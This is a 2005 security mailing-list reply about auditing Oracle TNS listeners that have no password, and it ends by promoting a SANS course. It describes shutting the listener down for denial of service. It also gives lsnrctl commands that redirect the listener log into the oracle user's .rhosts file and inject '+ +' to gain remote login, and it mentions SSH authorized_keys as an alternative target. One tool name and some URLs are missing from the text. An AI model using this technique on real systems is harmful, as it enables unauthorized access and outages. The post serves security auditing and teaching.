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Re: Oracle Auditing

From: Joshua Wright <jwright () hasborg com>
Date: Tue, 02 Aug 2005 21:49:55 -0400

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Joe T wrote:
When performing some network scans, I notice that the Oracle database
rarely has a password set for the tnslsnr account.
My question becomes: Has anyone exploited this misconfiguration, and
if so - how? Is this an account that you can connect to without
expensive Oracle software?

If the listener is not password protected, it's possible to change the
configuration of the listener or simply shut it down to cause a DoS.  To
do something more devious, we can use the listener logging feature:

(on the attacker's machine with a local copy of lsnrctl):

eve$ lsnrctl
LSNRCTL> set current_listener target_ip_or_host
LSNRCTL> set log_file /home/oracle/.rhosts

This will configure the listener to write logging information to the
specified file.  Next, we can use the tool to send a raw
string to the victim TNS listener:

eve$ -h target_ip_or_host --rawcmd "(CONNECT_DATA=((
+ +

This will connect to the listener and send the string
"(CONNECT_DATA=((<CR>+ +<CR>".  This information gets written to the
listener log file, which would produce a single line with "+ +".

If the target isn't running r-services, you can use other techniques to
obtain access to the remote OS.  Perhaps ~oracle/.ssh/authorized_key2?

Note that you can download a trial version of the Oracle database from, which would allow you to grab a copy of the lsnrctl tool.

This sample hack and several other Oracle auditing, assessment and
pen-test techniques are covered in the SANS Securing Oracle course.
SANS is offering the Securing Oracle course at our yearly Network
Security conference in New Orleans on 10/24-10/30.  More information on
the Securing Oracle course and the topics covered is available at

NB: I work for the SANS Institute, and teach the Securing Oracle class
(although I'll be teaching Assessing and Securing Wireless at the
Network Security conference).

- -Josh
- --
- -Joshua Wright
jwright () hasborg com

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